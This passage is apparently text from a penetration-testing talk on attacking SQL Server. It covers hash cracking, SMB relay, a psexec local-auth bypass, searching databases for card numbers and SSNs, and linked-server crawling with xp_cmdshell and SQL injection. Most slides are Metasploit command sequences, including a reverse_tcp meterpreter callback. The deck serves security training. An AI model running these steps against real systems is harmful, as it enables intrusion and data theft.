with seeded half LM Rainbow Tables:
rcracki_mt -h 5e17a06b538a42ae ./halflmchall
2. Crack the second half with john the ripper
to obtain case sensitive NTLM password.
perl netntlm.pl --seed GPP4H1 --file
/root/john_hashes.txt
http://www.metasploit.com/modules/auxiliary/server/capture/smb
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
25. SMB Relay: Setup SMBProxy for Relay
SMB Relay to 3rd Party with the SMB_Relay
Metasploit exploit module:
msfconsole
use exploit/windows/smb/smb_relay
set SMBHOST <targetserver>
exploit
If the service account has the local admin
privileges on the remote system, then a shell
will be returned by the smb_relay module
http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
26. SMB Relay: Force MS SQL to Auth
Force SQL Server to authenticate with the modules
MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI
Msfconsole
use auxiliary/admin/mssql/mssql_ntlm_stealer
set USE_WINDOWS_AUTHENT true
set DOMAIN <domain>
set USERNAME <user>
set PASSWORD <password>
set RHOSTS <IP RANGE>
set RPORT <port>
Set SMBPROXY <evil server>
run
28. SMB Capture/Relay: Using PW or Shell
If meterpreter then:
• Type: shell
• Type: osql –E –Q “what ever you want”
If password:
• Sign in via RDP
• Open a cmd console
• osql –E –Q “what ever you want”
30. Do a crazy dance!
BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
31. OS ADMIN DATABASE ADMIN
SQL Server Local Authorization Bypass
32. Local Auth Bypass: Summary
How can we go from OS admin to DB
admin?
• SQL Server 2000 to 2008
‒ LocalSystem = Sysadmin privileges
• SQL Server 2012
‒ Must migrate to SQL Server service process
for Sysadmin privileges
33. Local Auth Bypass: Summary
Transparent Encryption
=
Mostly Useless
(unless local hard drive encryption is in place and key management is
done correctly)
34. Local Auth Bypass: Psexec
On SQL Server 2000 to 2008
Execute queries as sysadmin with osql:
psexec –s cmd.exe
osql –E –S “localhostsqlexpress” –Q “select
is_srvrolemember(‘sysadmin’)”
Execute queries as sysadmin with SSMS:
psexec –i –s ssms
http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
35. Local Auth Bypass: Get Shell
Obtain Meterpreter shell using the PSEXEC module
msfconsole
use exploit/windows/smb/psexec
set RHOST <targetserver>
set SMBDOMAIN .
set SMBUSER <user>
set SMBPASS <password>
exploit
http://www.metasploit.com/modules/exploit/windows/smb/psexec
36. Local Auth Bypass: Get Sysadmin
Create sysadmin in database using the Metasploit
mssql_local_auth_bypass post module:
In Meterpeter type “background” to return to
msconsole. Then, in the msfconsole type:
use post/windows/manage/mssql_local_auth_bypass
set session <session>
set DB_USERNAME <username>
set DB_PASSWORD <password>
exploit
http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
45. Finding Data: Summary
GOAL = Find sensitive data!
• Credit cards
• Social security number
• Medical records
46. Finding Data: TSQL Script
Simple keywords search via TSQL!
EXEC master..sp_msforeachdb
'SELECT @@Servername as Server_Name,''[?]'' as
Database_name,Table_Name,Column_Name
FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE
Column_Name LIKE ''%password%''
OR Column_Name LIKE ''%Credit%''
OR Column_Name LIKE ''%CCN%''
OR Column_Name LIKE ''%Account%''
OR Column_Name LIKE ''%Social%''
OR Column_Name LIKE ''%SSN%''
ORDER BY Table_name'
47. Finding Data: Metasploit Module
Database scraping with the
mssql_findandsampledata module!
Features
• Scan multiple servers
• Authenticate with local Windows, Domain
or SQL credentials
• Sample data
• Number of records found
• Output to screen and CSV file
http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
48. Finding Data: Metasploit Module
Launching mssql_findandsampledata:
msfconsole
use auxiliary/admin/mssql/mssql_findandsampledata
set RHOSTS <range>
set RPORT <port>
setg USE_WINDOWS_AUTHENT true
setg DOMAIN <CompanyDomain>
set USERNAME <username>
set PASSWORD <password>
set SAMPLE_SIZE <size>
set KEYWORDS credit|social|password
exploit
57. Database Link Crawling: Summary
Database Links
• Allow one database server to query another
• Often configured with excessive privileges
• Can be chained together
• Use openquery() to query linked servers
• Can be used to execute the infamous
xp_cmdshell
• Tons of access, no credentials required (via SQL
injection)
59. Database Link Crawling: List Links
How do I list linked servers?
Two common options:
sp_linkedservers
and
SELECT srvname FROM master..sysservers
60. Database Link Crawling: List Links
How do I list linked servers on a linked server?
SELECT srvname FROM
openquery(DB1, 'select srvname FROM
master..sysservers')
61. Database Link Crawling: List Links
How do I list linked servers on the linked
server’s linked server?
SELECT srvname FROM
openquery(DB1,'SELECT srvname FROM
openquery(HVA,''SELECT srvname FROM
master..sysservers'')')
62. Database Link Crawling: You Get it!
….You get the point
You can follow links until you
run out
63. Database Link Crawling: Exec Cmds
How do I run commands on a linked server?
SELECT * FROM
openquery(DB1,’SELECT * FROM
openquery(HVA,’’SELECT 1;exec xp_cmdshell ‘’’’ping
192.168.1.1’’’’ ‘’)’)
64. Database Link Crawling: Modules
Two Modules
1. Direct connection
2. SQL Injection
Available for Download
• Not submitted to Metasploit trunk – Yet
• Downloads available from nullbind’s github
‒ mssql_linkcrawler.rb
‒ mssql_linkcrawler_sqli.rb
65. Database Link Crawling: Modules
• Features
‒ Crawl SQL Server database links
‒ Standard Crawl output
‒ Verbose Crawl output
‒ Output to CSV file
‒ Supports 32 and 64 bit Windows
‒ Global Metasploit payload deployment
‒ Targeted Metasploit payload deployment
‒ Payload deployment via powershell memory
injection
66. Metasploit Module: Run multi/handler
Setup the multi/handler module:
use multi/handler
set payload
windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
set ExitOnSession false
exploit -j -z
67. Metasploit Module: Link Crawler
Setup the mssql_linkcrawler_sqli module:
use exploit/windows/mssql/mssql_linkcrawler_sqli
set GET_PATH /employee.asp?id=1;[SQLi];--
set type blind
set RHOST 192.168.1.100
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.130
set lport 443
set DisablePayloadHandler true
exploit
70. Do a crazy cat disco dance!
Yes. It warrants 2 disco cats!
71. Database Link Chaining: Modules
Current Constraints
• Cannot crawl through SQL Server 2000
• Cannot enable xp_cmdshell through links
• Cannot deliver payloads to systems without
powershell (at the moment)
• Currently, the module leaves a powershell
process running on exit
• Currently, doesn’t allow arbitrary query
execution on linked servers
72. Conclusions
configure all accounts with
LEAST PRIVILEGE
system accounts
service accounts
database accounts
application accounts
73. Conclusions
always
VALIDATE INPUT
web apps
thick apps
mobile apps
web services